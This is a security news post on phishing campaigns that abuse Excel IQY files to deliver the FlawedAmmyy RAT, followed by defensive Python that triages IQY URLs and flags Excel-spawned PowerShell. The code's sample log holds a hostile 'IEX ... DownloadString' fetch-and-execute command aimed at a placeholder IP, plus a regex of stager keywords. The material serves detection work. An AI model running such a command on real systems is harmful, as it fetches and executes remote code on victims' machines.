Delaware, USA – October 8, 2018 — Adversaries are constantly looking for new ways to infect a victim's system, and the Excel Web Query file (IQY) has now attracted their attention: it has been used in recent campaigns to spread the FlawedAmmyy RAT. Last month, attackers distributed the multi-platform Adwind malware via malicious Excel documents with .CSV or .XLT extensions. IQY files are used to download data from the Internet directly into Excel; they contain a URL and several other parameters needed to make the query. Adversaries targeting the banking sector and the automotive industry send phishing emails with IQY or PDF files attached; the PDFs used in these campaigns carry an embedded IQY file. If a user opens the malicious attachment, it launches a PowerShell process that downloads a string from a URL and executes it with IEX (Invoke-Expression). The next PowerShell script downloads and executes the FlawedAmmyy RAT, which allows attackers to take over the infected computer, manage its files and take screenshots.
This is the first time IQY files have been leveraged in a major spam campaign in the wild. Because the technique is new, and because IQY files have legitimate use cases, they bypass most filters and antivirus tools. Their ability to open Excel and (if users choose to ignore the warnings) download any data from the Internet makes them extremely dangerous. To detect the FlawedAmmyy RAT, you can use your existing security solutions together with free SIEM rules from Threat Detection Marketplace: https://tdm.socprime.com/sigma/generate/swIC1WMBqfpvXJhTewwE/
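The two defender-side checks the article implies, as an added example that is not part of the original post and not SOC Prime's rule: triaging the URL inside an IQY attachment before a user is allowed to run it, and flagging the Excel-to-PowerShell process chain in process-creation logs. It assumes the common IQY layout (a "WEB" type line, a version line, the URL, then optional Key=Value lines) and Sysmon-style field names (Image, ParentImage, CommandLine); the IQY text, the allow-list and the log records are constructed samples, not artifacts from the campaign.

```python
"""Defender-side triage for IQY-based delivery: inspect an .iqy file's query
target and flag Excel-to-PowerShell process chains in Sysmon-style logs.
All inputs below are constructed samples, not real campaign artifacts."""
import ipaddress
import os
import re
from urllib.parse import urlsplit

# Assumption about the IQY layout: line 1 is the query type ("WEB"), line 2 a
# version number, line 3 the URL, then optional Key=Value parameter lines.
SAMPLE_IQY = "WEB\n1\nhttp://203.0.113.10/update.dat\nSelection=AllTables\nFormatting=None\n"

TRUSTED_HOSTS = {"reports.example.invalid"}  # constructed allow-list of query sources


def parse_iqy(text):
    """Return the query type, version, URL and parameters, or None if not a WEB query."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None
    params = {}
    for ln in lines[3:]:
        if "=" in ln:
            key, value = ln.split("=", 1)
            params[key.strip()] = value.strip()
    return {"type": lines[0], "version": lines[1], "url": lines[2], "params": params}


def assess_iqy(text, trusted_hosts=TRUSTED_HOSTS):
    """List the reasons an IQY file deserves a closer look before Excel fetches its data."""
    parsed = parse_iqy(text)
    if parsed is None:
        return ["not a WEB query"]
    url = urlsplit(parsed["url"])
    host = (url.hostname or "").lower()
    findings = []
    if url.scheme != "https":
        findings.append("plain-text transport: " + url.scheme)
    if host not in trusted_hosts:
        findings.append("host not on allow-list: " + host)
    try:
        ipaddress.ip_address(host)
        findings.append("IP-literal host")
    except ValueError:
        pass  # a DNS name, nothing to add
    return findings


OFFICE_PARENTS = {"excel.exe"}  # the campaign abuses Excel; extend for other Office hosts
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Command-line fragments typical of a download-and-run stager (IEX is the one named above).
DOWNLOAD_EXEC = re.compile(r"(?i)(\biex\b|invoke-expression|downloadstring|downloadfile|frombase64string)")

# Constructed Sysmon-style process-creation records (Event ID 1 field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\ops\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "powershell.exe Get-Date"},
]


def detect_office_spawn(events):
    """Return (index, severity) for every PowerShell launched by Excel; severity is
    'high' when the command line also carries a download-and-execute primitive."""
    hits = []
    for i, ev in enumerate(events):
        # Normalise Windows paths so basename() works on any platform.
        parent = os.path.basename(ev["ParentImage"].replace("\\", "/")).lower()
        image = os.path.basename(ev["Image"].replace("\\", "/")).lower()
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            severity = "high" if DOWNLOAD_EXEC.search(ev["CommandLine"]) else "medium"
            hits.append((i, severity))
    return hits


if __name__ == "__main__":
    print(assess_iqy(SAMPLE_IQY))           # three findings for the sample file
    print(detect_office_spawn(SAMPLE_EVENTS))  # events 0 (high) and 2 (medium)
```

The IQY check is deliberately an allow-list rather than a block-list: legitimate web queries point at a small, known set of hosts, so anything else is worth a human look even when it is not obviously malicious. The process check is the Sysmon-side counterpart of the Sigma rule linked above; an Excel parent spawning PowerShell is itself rare enough to alert on, and the command-line match only raises the priority.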